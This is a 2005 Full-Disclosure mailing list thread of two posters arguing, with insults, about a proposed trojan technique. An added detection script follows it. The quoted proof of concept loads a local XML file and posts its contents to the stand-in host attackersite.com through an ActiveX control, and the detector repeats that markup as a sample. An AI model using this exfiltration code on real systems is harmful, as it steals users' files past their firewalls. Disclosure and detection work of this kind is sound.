typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.
On 12/22/05, Gaurav Kumar <[EMAIL PROTECTED]> wrote:
> oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years kidder than
> u)
>
> The _real_ thing is that I proved the point.
> U told win xp will give access denied error. I proved u wrong with the
> proof attached.
> U told above technique wont work...i proved u wrong.
> Tell me one thing, a Windows XP + Office XP + Internet explorer
> combination so rare ?
>
> Is that all making ur ego shattered?
>
> ...and u are no one to decide what should one discuss on this list.
>
> regards,
> gaurav
>
> On 12/22/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote:
> > Kid,
> > Although I normally don't reply to such frivolous and lame statements but
> > your reply has seriously pissed me off.. So dropping few lines, perhaps will
> > help you grow up !!
> >
> > -----Original Message-----
> > >> From: Gaurav Kumar brazenly wrote:
> >
> > >> Looks like u need to read again what i wrote. I didnt use the word
> > >> 'spread'.
> >
> > I don't have to !! I can still remember your priceless statements [1] + [2] -
> >
> > [1] A Trojan has been to be placed in a system running an application
> > [1] firewall like Zone Alarm Pro etc.
> >
> > [2] The target system must be having office XP and the user has to be
> > [2] lured to view a webpage hosted by attacker.
> >
> > ROFL !! May be you could just ask your l33t victim to send you his passwords
> > and other info by email :P Don't forget to send him your l33t email ID -
> > '@securebox.org'
> >
> > >> [3] Moreover, u need not know if the target system is running ZA or not...
> > >> [3] "the technique works even if firewall is not installed".
> >
> > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt matter is ZA
> > >> [4] or any other FW is running on client".
> >
> > Looking at statement [3] & [4], (especially the statement within double
> > quotes) just made me believe that you don't know what you are talking about
> > unless you want to look like an idiot.
> >
> > >> really? ever heard of IE exploits?
> >
> > Priceless !!
> >
> > >> Well..Exactly! i would suggest u read the 'assumptions' first, its
> > >> an assumption that user will click yes to warning...like most 'normal'
> > >> users do.
> >
> > Yet another priceless statement... Maybe you could just ask your l33t victim
> > to click 'yes' to your l33t piece of code trying to download some l33t piece
> > of shit which will fail to run and die like an idiot.
> >
> > I am sure you have enough l33t skills to strike back to keep your ego
> > up2date however, I wud rather suggest if you have only your stupidity to
> > share then feel free to take it offline and don't piss off everyone in this
> > list. I would welcome you if you really want to strike back with some
> > _serious_ technical stuff. (Note: make a note of _serious_ in the statement)
> >
> > - D
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gaurav Kumar
> > Sent: Thursday, December 22, 2005 8:52 AM
> > To: Debasis Mohanty
> > Cc: [email protected]; [EMAIL PROTECTED]
> > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique?
> > using JavaScript+XML+OWSPost Data
> >
> > On 12/22/05, Debasis Mohanty <[EMAIL PROTECTED]> wrote:
> > > -----Original Message-----
> > > From: Gaurav Kumar
> > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > To: [email protected]
> > > Cc: [EMAIL PROTECTED]
> > > Subject: [Full-disclosure] new attack technique? using
> > > JavaScript+XML+OWSPost Data
> > >
> > > 1>> A Trojan has been to be placed in a system running an application
> > > 1>> firewall like Zone Alarm Pro etc.
> > >
> > > >> Assumptions:
> > >
> > > 2>> The target system must be having office XP and the user has to be
> > > 2>> lured to view a webpage hosted by attacker.
> > >
> > > 3>> The Trojan can be designed to generate an xml file which will
> > > 3>> contain the data to be sent out. The attacker will lure the
> > > 3>> user to visit a website hosted by him.
> > >
> > > Lol !! In a practical scenario, the attacker who spreads the
> > > worm/trojans himself is not aware in the initial stage which are the
> > > infected machines unless the trojan sends back the machine/user info
> > > back to the attacker. Now as you have already mentioned ZA is running
> > > then no data can be sent back to the attacker. So the attacker is clueless
> > > which are those infected machines.
> >
> > Looks like u need to read again what i wrote. I didnt use the word 'spread'.
> > Moreover, u need not know if the target system is running ZA or not...the
> > technique works even if firewall is not installed. I am discussing a
> > possible 'design' of a trojan here, doesnt matter is ZA or any other FW is
> > running on client.
> >
> > > So the case of luring the user to visit the link is out of scope...
> >
> > really? ever heard of IE exploits?
> >
> > > >> The site can have following HTML code-
> > >
> > > Now coming back to technical stuff, You are trying to access a local
> > > file which will only be allowed if the site is in "Trusted Sites" or
> > > "Local Intranet" or "Local Security Zone" and activex not marked safe.
> > > The fact that *the client is also the server* is irrelevant.
> > >
> > > Try uploading the script to some webserver and give a html extension;
> > > it will throw an _access denied_ error when the page loads (even on
> > > Win XP + SP1).
> > >
> > > In case of any server side extension like *.asp, *.jsp etc, the user
> > > will be prompted that a malicious component is trying to load and ask
> > > for user permission.
> > >
> > > >> <html>
> > > >> <body>
> > > >> The author is not responsible for any misuse, this PoC is for
> > > >> educational purpose only.
> > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > >> id="exp">
> > > >> </object>
> > > >> <script LANGUAGE=javascript>
> > > >> var xmlDoc
> > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > >> xmlDoc.async=false;
> > > >> xmlDoc.load("c:\\note.xml");
> > > >> xmlObj=xmlDoc.documentElement;
> > > >> var a= xmlObj.firstChild.text;
> > > >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > >> </script>
> > > >> </body>
> > > >> </html>
> > >
> > > >> The above code (works well on windows XP SP2) essentially calls "OWS
> > > >> Post Data" COM control to post the contents of note.xml (generated
> > > >> by trojan) to attackersite.com
> > >
> > > IMHO, never conduct such tests in an "Intranet Zone" or "Local Zone"
> > > and draw conclusion about "Internet Security Zone".
> > >
> > > You may also like to know about this issue -
> > > http://support.microsoft.com/kb/317244/EN-US/
> > >
> > > >>> Essentially, the technique is breaking the basic functionality of
> > > >>> application firewalls by using OWS Post Data as bridge for sending
> > > >>> out the data using Javascript and XML.
> > >
> > > Not Exactly !! I wud rather suggest you to do a little more research
> > > and draw any conclusion. Keep those _Security Zones_ in mind before
> > > you post anything...
> >
> > Well..Exactly! i would suggest u read the 'assumptions' first, its an
> > assumption that user will click yes to warning...like most 'normal'
> > users do.
> >
> > > - D

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
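
Added example, not part of the thread and not written by either poster: a static check a proxy or mail gateway could run to flag HTML that combines the elements of the quoted PoC (the OWS Post Data CLSID, a script-side XMLDOM load of a local path, and a Post() call on that control). The function name `auditPage`, the finding labels and the benign sample are assumptions made for illustration.

```javascript
// Added example: static triage for the pattern in the quoted PoC.
// CLSID, ProgID and sample markup come from the thread; auditPage(), the
// finding labels and BENIGN_SAMPLE are assumptions made for illustration.
const OWS_POST_CLSID = "BDEADE98-C265-11D0-BCED-00A0C90AB50F";

function auditPage(html) {
  const findings = [];
  const controlIds = [];
  // 1. <object> tags that instantiate the OWS Post Data control.
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const clsid = /classid\s*=\s*["']?\s*clsid:\{?([0-9a-f-]{36})\}?/i.exec(tag);
    if (!clsid || clsid[1].toUpperCase() !== OWS_POST_CLSID) continue;
    findings.push("ows-post-object");
    const id = /\sid\s*=\s*["']?(\w+)/i.exec(tag);
    if (id) controlIds.push(id[1]);
  }
  // 2. MSXML DOM created from script.
  if (/new\s+ActiveXObject\s*\(\s*["']Microsoft\.XMLDOM["']/i.test(html)) {
    findings.push("xmldom-activex");
  }
  // 3. .load() aimed at a drive-letter path or file: URL (local file read).
  if (/\.load\s*\(\s*["'](?:[a-z]:[\\/]|file:)/i.test(html)) {
    findings.push("local-file-load");
  }
  // 4. Post() on a flagged control with an absolute http(s) destination.
  for (const id of controlIds) {
    const post = new RegExp("\\b" + id + "\\.Post\\s*\\([^)]*[\"'](https?://[^\"'/]+)", "i").exec(html);
    if (post) findings.push("post-to:" + post[1]);
  }
  const exfilPattern = findings.includes("ows-post-object") &&
    findings.includes("local-file-load") &&
    findings.some((f) => f.startsWith("post-to:"));
  return { findings, exfilPattern };
}

// Markup as posted in the thread (String.raw keeps the doubled backslash).
const POC_SAMPLE = String.raw`<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
id="exp"></object>
<script LANGUAGE=javascript>
xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.load("c:\\note.xml");
exp.Post(0,"http://www.attackersite.com/input.asp",a);
</script>`;
// Constructed benign page: a different control and a relative load.
const BENIGN_SAMPLE = `<object classid="clsid:{00000000-0000-0000-0000-000000000000}"
id="player"></object><script>doc.load("note.xml");</script>`;

console.log(auditPage(POC_SAMPLE), auditPage(BENIGN_SAMPLE));
```

The check is purely textual, so it reports that the pattern is present in the markup, not whether the browser's security zone would let it run.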
